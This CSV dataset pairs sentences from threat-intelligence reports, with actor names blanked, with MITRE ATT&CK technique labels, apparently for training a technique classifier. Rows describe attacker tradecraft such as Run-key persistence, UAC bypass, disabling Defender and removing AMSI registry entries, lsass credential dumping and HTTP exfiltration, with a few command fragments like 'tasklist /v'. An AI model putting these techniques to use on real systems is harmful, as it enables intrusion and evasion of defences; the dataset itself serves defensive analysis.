text,label
has used  to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.,T1016
has named the malicious DLL the same name as DLLs belonging to legitimate software from various security vendors.,T1036.005
The model uses the persistence technique utilizing svchost.exe with service.dll to install a rogue service.,T1569.002
The loader component is executed via RUNDLL32.EXE,T1218.011
the list of processes,T1057
"HTTP POST request that contains
the command output.",T1071.001
A backdoor used by  created a  hidden service to forward traffic from the  client to local ports 3389 (RDP) 139 (Netbios) and 445 (SMB) enabling full remote access from outside the network and has also used TOR.(Citation: Mandiant No Easy Breach),T1090
can delete downloaded executables after running them.,T1070.004
has used the ps command to list processes.,T1057
has a module for capturing keystrokes per process including window titles.,T1056.001
has been observed using SQL injection to gain access to systems.(Citation: Novetta-Axiom),T1190
configuration is hardcoded and RC4 encrypted within the binary.,T1027
basic discovery tasks on the host using built in Windows utilities.,T1059.003
can determine whether a system has a 32 bit or 64 bit architecture.,T1082
utilizes scheduled tasks as a persistence mechanism.,T1053.005
System Directory,T1083
"there is a custom AntivirusCheck class, which can check running processes against a hardcoded list of XOR-encrypted executable filenames from known security products: 360 Total Security, Avast, Avira, AVG, Bitdefender, ESET, Jiangmin Technology Antivirus, Kingsoft, McAfee, Micropoint, Norton, Rising Antivirus, and Trend Micro.",T1518.001
has the ability to capture screenshots.,T1113
can run `set.bat` `update.bat` `cache.bat` `bcd.bat` `msrun.bat` and similar scripts.,T1059.003
C:\Windows\system32\cmd.exe /C,T1059.003
Get-Keystrokes Exfiltration module can log keystrokes.(Citation: GitHub PowerSploit May 2012),T1056.001
dumps memory from specific processes on a victim system parses the dumped files and scrapes them for credit card data.(Citation: Kroll RawPOS Jan 2017)(Citation: TrendMicro RawPOS April 2015),T1005
has the ability to enumerate drive types.,T1083
"(To bypass UAC) configurable setting for the process to abuse  Other than these, new coding algorithm has been introduced",T1548.002
has relied on victim's executing malicious file attachments delivered via email or embedded within actor-controlled websites to deliver malware.(Citation: SecureWorks August 2019)(Citation: Dragos Hexane)(Citation: ClearSky Siamesekitten August 2021),T1204.002
"StartSendScreen
Start screen capture
StopSendScreen
Stop screen capture",T1113
has used HTTP POST requests for C2.,T1071.001
has the ability to modify the Registry to add its binaries to the Windows Defender exclusion list.,T1562.001
gathers the local IP address.,T1016
can log keystrokes.(Citation: Trend Micro Daserf Nov 2017),T1056.001
"Once the user had mounted the ISO and the LNK file was executed by the user, the complex execution flow started.",T1204.002
encrypts C2 traffic with a custom RC4 variant.,T1573.001
can manage services and processes.,T1569.002
has the ability to identify the current user on the infected host.,T1033
"an encoded payload split across several nodes, further complicating its extraction.",T1027
"Windows services ran with the highest privilege, NT AUTHORITY\SYSTEM and execute the malware automatically during system startup, allowing for remote access to the victim device with persistence.",T1569.002
has used Daniel Bohannons Invoke-Obfuscation framework and obfuscated PowerShell scripts.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: GitHub Invoke-Obfuscation) The group has also used other obfuscation methods including Base64 obfuscation of VBScripts and PowerShell commands.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021),T1027
stores the encoded configuration file in the Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security.(Citation: US-CERT Volgmer 2 Nov 2017),T1112
has collected files and data from a compromised host.,T1005
has the ability to enumerate fixed logical drives on a targeted system.,T1082
has been observed enumerating local processes.,T1057
has used the command-line interface.(Citation: Unit 42 Magic Hound Feb 2017),T1059.003
they accessed the server via Anydesk.,T1219
can establish a LNK file in the startup folder for persistence.,T1547.001
"McAfee detects these threats as:  RDN/Generic Exploit RDN/Generic.dx Generic PWS.y Generic.hbg Exploit-CVE2018-4878  McAfee customers are also covered by McAfee Global Threat Intelligence Web Reputation classification, which rate these URLs as High Risk",T1068
Windows Management Instrumentation (WMI).,T1047
has captured credentials via fake Outlook Web App (OWA) login pages and has also used a .NET based keylogger.(Citation: FireEye Hacking FIN4 Dec 2014),T1056.001
s Java payload is encrypted with AES.(Citation: jRAT Symantec Aug 2018) Additionally backdoor files are encrypted using DES as a stream cipher. Later variants of  also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool.,T1027
"proxy/tunneling utilities (HTran, LCX, EarthWorm",T1090
Decryption exclusion list,T1140
also leveraging steganography to locate the start of the encoded payload,T1027
has used a brute-force/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days.(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)  has also used a Kubernetes cluster to conduct distributed large-scale password guessing attacks.,T1110
apparently altered  samples by adding four bytes of random letters in a likely attempt to change the file hashes.,T1027
The decryption routine shared between the BADCALL for Linux and targeted destructive malware for Windows from 2014,T1140
installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not it will spawn a new instance.,T1543.003
"Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows’ Remote Desktop Protocol (RDP).",T1021.001
has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.(Citation: Symantec Tick Apr 2016),T1204.002
has the ability to upload and download files to and from a compromised host.,T1105
can monitor processes on a compromised host.,T1057
is known to use software packing in its tools.,T1027
has encrypted an ELF file.,T1027
use brute force password attacks,T1110
"the command line dump of the memory:
cmd /c",T1059.003
has deleted itself and associated artifacts from victim machines.,T1070.004
They then opened an RDP connection back to the primary domain controller,T1021.001
has been packed with Enigma Protector to obfuscate its contents. ,T1027
embedded malware:,T1027
"Remote access tools were used for command and control, such as Tactical RMM and Anydesk.",T1219
encrypted payload ,T1027
The malware can deliver payloads from the command and control (C2) server,T1105
has used RDP during operations.,T1021.001
has the ability to download and execute additional files.,T1105
can use HTTP or HTTPS for command and control to hard-coded C2 servers.(Citation: F-Secure The Dukes),T1071.001
has used tools to download malicious code.,T1105
PE injection,T1055
has a limited number of built-in modules for exploiting remote SMB JBoss and Jenkins servers.,T1210
malware gathers system information via Windows Management Instrumentation (WMI).,T1047
The threat actor attempted to remotely list running processes on systems using tasklist.exe,T1057
The FileData member of the FileDataStoreObject is the key member that holds the embedded data in the OneNote document.,T1027
has the capability to gather the IP address from the victim's machine.,T1016
the threat actors had the clear text credentials for one of the domain administrator accounts and began moving lateral to other systems,T1078
has been executed through malicious e-mail attachments ,T1204.002
routinely removed their tools including custom backdoors once remote access was achieved.  has also used  to remove artifacts from victims.(Citation: FireEye SUNBURST Backdoor December 2020),T1070.004
has looked for files in the user's home directory with wallet in their name using find.,T1083
the encrypted data,T1027
to decode the second buffer using key 58 3E 88 D0,T1140
can download and execute new versions of itself.,T1105
used HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\[a-f0-9A-F]{8} to maintain persistence.,T1547.001
collects MAC address and local IP address information from the victim.,T1016
examples of command lines,T1059.003
can use large file sizes to evade detection.(Citation: Trend Micro Qakbot May 2020),T1027
SMB beacons open a local port on the target host and listen for incoming communication from a parent beacon,T1090
can take screenshots on remote hosts.,T1113
has been packed with the UPX packer.,T1027
can copy cmd.exe into the system temp folder.,T1059.003
used encoded PowerShell commands.,T1027
"Register the RUN key in the registry below, so that the VBS file is executed every time the machine starts",T1547.001
tools have registered Run keys in the registry to give malicious VBS files persistence.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020),T1547.001
creates a backdoor through which remote attackers can retrieve lists of files.,T1083
has injected its DLL component into `EhStorAurhn.exe`.,T1055
Operators deploying  have used psexec to copy the  payload across accessible systems.,T1570
using the command line,T1059.003
An  loader Trojan uses a cmd.exe and batch script to run its payload.(Citation: Unit 42 Playbook Dec 2017) The group has also used macros to execute payloads.(Citation: Talos Seduploader Oct 2017)(Citation: Unit42 Cannon Nov 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018),T1059.003
has used large file sizes to avoid detection.,T1027
can collect data on a compromised host.(Citation: Malwarebytes Kimsuky June 2021),T1005
has the ability to upload a file from the command and control (C2) server to the victim machine.,T1105
used by the threat actor for the remote management of Tactical RMM Agent.,T1219
has been observed being used to download  and the Cobalt Strike Beacon payload onto victims.,T1105
Malware immediately decrypts the third layer,T1140
screenshot,T1113
Some strings in  are obfuscated with XOR x56.,T1027
This strangeness was related to values listed in newer BlackEnergy configuration files,T1027
has used tmp files to stage gathered information.,T1074.001
can bypass Windows UAC through either DLL hijacking eventvwr or appPaths.,T1548.002
recursively removes the implementation of Windows Defender IOfficeAntiVirus under HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}.,T1112
exfiltrates information to the C2 through the HTTP protocol.,T1041
this executable is an archive that can be unpacked with the help of 7zip,T1027
Various  malware enumerates logged-on users.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020),T1033
"To bypass UAC, BlackCat ransomware may escalate privileges using the ICMLuaUtil COM interface, as well as use the Masquerade PEB method.",T1548.002
 smb and exploit in same sentence ,T1210
"Is able to steal/gather information on CPU type, screen resolution",T1082
can query the Registry on compromised hosts using RegQueryValueExA.,T1012
It checks running processes for executables of several known cybersecurity vendors.,T1518.001
collects information about running processes.,T1057
has used the Farse6.1 utility (based on ) to extract credentials from lsass.exe.,T1003.001
has the ability to collect the hostname OS version and OS architecture of an infected host.,T1082
can detect network adapter and IP address information.,T1016
The team used these platforms to create flexible and dynamic redirect servers to send traffic to the team’s Cobalt Strike servers,T1090
can execute shell commands on a compromised host.,T1059.003
has the ability to search for Kaspersky Antivirus on a victim's machine.,T1518.001
uses tasklist /v to check running processes.,T1057
can record keystrokes from both the keyboard and virtual keyboard.(Citation: ESET RTM Feb 2017),T1056.001
by modifying Group Policy Objects,T1484.001
has been obfuscated with a XOR-based algorithm.(Citation: ZScaler Squirrelwaffle Sep 2021),T1027
"Upon execution, the initialized file downloads multiple malicious payloads from remote servers",T1105
the data was stored in a location in the Internet Information Services (IIS) web server and exfiltrated over HTTP using GET requests towards the exact file paths,T1041
has used HTTPS over port 443 for command and control.,T1071.001
uses the ipconfig /all command to gather the victims IP address.,T1016
UAC bypass is executed,T1548.002
the username,T1033
can list files and directories.(Citation: ESET Sednit Part 2),T1083
has used e-mail attachments to lure victims into executing malicious code.,T1204.002
process listing,T1057
beacon payload is capable of running shell commands without cmd.exe and PowerShell commands without powershell.exe,T1106
brute forcing tool called FSCAN.,T1110
uses the tasklist to view running processes on the victims machine.,T1057
can use native command line for execution.,T1059.003
attempts to get users to launch malicious attachments delivered via spearphishing emails.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017),T1204.002
For  the threat actors used a variety of packers including CyaX to obfuscate malicious executables.,T1027
can determine if the OS on a compromised host is newer than Windows XP.,T1082
has used the .NET csc.exe tool to compile executables from downloaded C# code.,T1027
the code can be injected into other legitimate running processes,T1055
The message above the ‘Open’ button instructs the user to “double click” in order to receive the attachment.,T1204.002
"To evade detection, the threat actors disabled Windows Defender",T1562.001
Screen capture,T1113
A version of  searches for filenames created with a previous version of the malware suggesting different versions targeted the same victims and the versions may work together.,T1083
has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.,T1204.002
During  the threat actors relied on users to enable macros within a malicious Microsoft Word document.,T1204.002
has used CVE-2014-6324 and CVE-2017-0213 to escalate privileges.(Citation: SecureWorks BRONZE UNION June 2017),T1068
communicates with the C2 server specified in the configuration via HTTP or HTTPS POST requests,T1071.001
lateral movement scripts such as WMIExec.,T1047
collects the account name of the logged-in user and sends it to the C2.,T1033
can send and receive data over HTTP.,T1071.001
can enumerate the system drives and associated system name.,T1082
has masqueraded as trusted software rsyncd and dbus-inotifier.,T1036.005
Configuration Config.ini is the file where the malware stores its encrypted configuration data,T1027
the PowerShell being executed was Base64 encoded,T1027
used the startup folder for persistence.(Citation: Securelist Machete Aug 2014),T1547.001
can connect to and disable the Symantec server on the victim's network.,T1562.001
has used the Windows API to make detection more difficult. ,T1106
"Each block is then
re-encrypted with the new key material as follows:
 The encryption key is the 16-byte GUID",T1027
has used Tor to log in to victims' email accounts.,T1090
can attempt to uninstall Kaspersky Antivirus or remove the Kaspersky license; it can also add all files and folders related to the attack to the Windows Defender exclusion list.,T1562.001
has used `cmd.exe` to run commands on a compromised host.,T1059.003
HTTPS activity from IP address  to the organization’s VMware server.,T1071.001
s C2 proxy tool sends data to a C2 server over HTTP.,T1071.001
now responsible for decoding the configuration.,T1140
has the ability to identify the domain and the MAC and IP addresses of an infected machine.,T1016
has the ability to download and execute files on a compromised host.,T1105
An  HTTP malware variant establishes persistence by setting the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\.,T1547.001
proxying the traffic,T1090
can use TCP to communicate between its agent and client modules.,T1095
The  loader can support the `Dij` command which gives it the ability to inject DLLs into the memory of other processes.(Citation: Proofpoint Bumblebee April 2022),T1055
can download files to a compromised host.,T1105
to download the malicious update.bat file from the C2 domain,T1105
uses rundll32.exe to install itself on remote systems when accessed via  or wmic.,T1218.011
and only decoded as needed.,T1140
launches a shell to execute commands on the victims machine.,T1059.003
The malware will continue to read and decrypt goopdate,T1140
Disable Automatic Update and change Windows configurations related to Windows Update ,T1562.001
"Using cmd.exe,",T1059.003
can run the ShellExecuteW API via the Windows Command Shell.,T1106
has the ability to communicate with C2 with TCP over port 443.,T1095
has used  in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has also used certutil -decode to decode files on the victims machine when dropping .(Citation: Accenture Hogfish April 2018),T1140
dropper can be packed with UPX.,T1027
"(crawl whole tree), I:, H:, G:, F:, E:, and D:.",T1083
can download additional files and tools from its C2.,T1105
the orchestrator injects the network component into memory,T1055
has commands to list drives on the victim machine and to list file information for a given directory.,T1083
can use TCP to communicate with command and control servers.,T1095
"web shell with filenames that masquerade as human.aspx, which is a legitimate component of the MOVEit Transfer software.",T1036.005
has extracted tar.gz files after downloading them from a C2 server.,T1140
has downloaded binary data from a specified domain after the malicious document is opened.,T1105
has used a custom proxy tool called Agent which has support for multiple hops.,T1090
has the ability to identify the user name.,T1033
 poison name services,T1557.001
can retrieve and execute additional  payloads from the C2 server.,T1105
can execute command line scripts received from C2.,T1059.003
machine names,T1082
malware samples are packed with UPX Packer.,T1027
has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers.,T1210
has the ability to use HTTP in communications with C2.,T1071.001
can query the host's Registry key at HKEY_CURRENT_USER\Console\QuickEdit to retrieve data.,T1012
the function used to encrypt and decrypt the embedded module,T1027
encrypts communications using AES256.,T1573.001
has multiple proxy options that mask traffic between the malware and the remote operators.,T1090
has used local account credentials found during the intrusion for lateral movement and privilege escalation.,T1078
creates a batch script,T1059.003
"After unpacking the module, it is packed with an additional inner packer Pe123\RPolyCryptor",T1027
modifies several registry keys for persistence and UAC bypass.,T1112
Embedded encrypted payload ,T1027
has used the BOtB tool which exploits CVE-2019-5736. ,T1068
establishes persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key.(Citation: Anomali Evasive Maneuvers July 2015),T1547.001
marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.,T1070.004
The current username home folder,T1033
Threat actor uploaded the fast reverse proxy (FRP) binary,T1090
is capable of spawning a Windows command shell.(Citation: EFF Manul Aug 2016),T1059.003
to exfiltrate data to external C2 servers.,T1041
cmd /C,T1059.003
Copying of files across SMB shares,T1570
it collects usernames,T1033
can enumerate storage volumes and folder contents of a compromised host.,T1083
content in a batch script:,T1059.003
has the ability to decrypt and decompress its payload to enable code execution.(Citation: Proofpoint TA505 October 2019),T1140
miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019),T1027
During  threat actors edited variable names within the  suite to avoid automated detection.,T1027
can identify the computer name of a compromised host.(Citation: PWC WellMess July 2020),T1082
has the ability to use  to run a Portable Executable (PE) on the compromised host.,T1059.003
accessible through API functions.,T1106
the loader decrypts and parses the embedded installation configuration,T1140
has dumped credentials including by using .(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong),T1003.001
has a command to collect the victim's IP address.,T1016
has used CreateProcessW to create child processes.,T1106
used chains of compromised routers to proxy C2 communications between them and cloud service providers.,T1090
has used a batch script that adds a Registry Run key to establish malware persistence.,T1547.001
Before exfiltration 's backdoor has used hidden files to store logs and outputs from backdoor commands.,T1564.001
can capture and compress stolen credentials from the Registry and volume shadow copies.,T1005
collects the volumes mapped on the system and also steals files with the following extensions: .docx .doc .pptx .ppt .xlsx .xls .rtf and .pdf.,T1083
OS architecture (x86 or x64),T1082
has the ability to download files from C2 to a compromised host.,T1105
the malware uses the “del” command,T1070.004
enumerates the IP address network proxy settings and domain name from a victim's system.,T1016
cmd /c,T1059.003
has created a scheduled SYSTEM task that runs when a user logs in.,T1053.005
has exploited vulnerabilities in the VBoxDrv.sys driver to obtain kernel mode privileges.,T1068
"Get processor information of the compromised host by executing ""SELECT * FROM Win32_Processor""",T1082
has side-loaded its malicious DLL file.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018) ,T1574.002
leverages the Windows API calls: VirtualAlloc() WriteProcessMemory() and CreateRemoteThread() for process injection.,T1106
can download and execute payloads on a target host.,T1105
enumerate processes,T1057
MS\d{2}-\d{3},T1210
 has added the exfiltrated data to the URL over the C2 channel. ,T1041
can hook APIs kill processes break file system paths and change ACLs to prevent security tools from running.,T1562.001
used a file listing plugin to collect information about file and directories both on local and remote drives.,T1083
creates new services to establish persistence.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010),T1543.003
executed by rundll32.exe.,T1218.011
a batch file.,T1059.003
"After establishing the reverse SOCKS proxy connection,",T1090
from the decrypted configuration,T1140
Malware used by  is capable of remotely deleting files from victims.,T1070.004
has the ability to launch scheduled tasks to establish persistence.,T1053.005
can identify the installed antivirus product on a targeted system.(Citation: Crowdstrike Qakbot October 2020)(Citation: ATT QakBot April 2021)(Citation: ATT QakBot April 2021),T1518.001
The CMD file contains commands,T1059.003
"modifies registry keys to maintain persistence,",T1112
has used wmic.exe for local discovery information.,T1047
can exploit multiple vulnerabilities including EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0144).,T1210
can generate encrypted compressed/encoded or otherwise obfuscated code modules.,T1027
"In other cases, the adversary moved laterally to another system with a domain admin logged in.",T1078
has compromised networks by exploiting Internet-facing applications including vulnerable Microsoft Exchange and SharePoint servers.,T1190
"The contents of hidden folder “me”, included several files and folders that were used for the execution",T1564.001
malware creates a scheduled task entitled IE Web Cache to execute a malicious file hourly.,T1053.005
has the capability to gather the victim's current directory.,T1083
sets its DLL file as a new service in the Registry to establish persistence.,T1543.003
Heavy obfuscation in a simple but useful anti-analysis approach makes it difficult for security products to detect their scripts.,T1027
uses a custom crypter leveraging Microsofts CryptoAPI to encrypt C2 traffic.(Citation: Fidelis TrickBot Oct 2016)Newer versions of  have been known to use `bcrypt` to encrypt and digitally sign responses to their C2 server. ,T1573.001
has used rundll32.exe for execution.,T1218.011
has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either  Bokbot  or .(Citation: CrowdStrike Grim Spider May 2019),T1566.001
